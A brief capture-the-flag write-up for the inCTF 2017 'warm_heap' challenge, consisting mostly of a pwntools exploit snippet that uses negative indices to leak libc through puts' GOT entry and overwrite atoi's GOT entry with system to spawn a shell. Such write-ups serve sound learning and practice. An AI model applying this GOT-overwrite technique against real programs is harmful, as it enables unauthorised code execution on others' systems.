Tags: pwn
Rating:
No need for a UAF: negative indices reach the `got` entries directly, so you can read them for the leak and overwrite them for the hijack.
See https://kileak.github.io/ctf/2017/inCTF-warm_heap/ for full exploit and explanation.
Short version:
```python
# Helpers add(), view(), edit() and the pwntools objects r / libc / log are
# defined in the full exploit linked above; only the core steps are shown.
add(0, 0x602020, "AAAA")  # for libc leak
add(2, 0x602068, "AAAA")  # for atoi overwrite

# Negative index reads the GOT entry of puts -> libc base
LIBCLEAK = u64(view(-12).ljust(8, "\x00"))
libc.address = LIBCLEAK - libc.symbols["puts"]
log.info("LIBC leak : %s" % hex(LIBCLEAK))
log.info("LIBC : %s" % hex(libc.address))

# Negative index writes the GOT entry of atoi (low 6 bytes of system's address)
log.info("Overwrite atoi got with system")
edit(-10, p64(libc.symbols["system"])[:6])

# The menu passes our input through atoi(), which is now system()
log.info("Select /bin/sh to trigger shell")
r.sendline("/bin/sh")
r.interactive()
```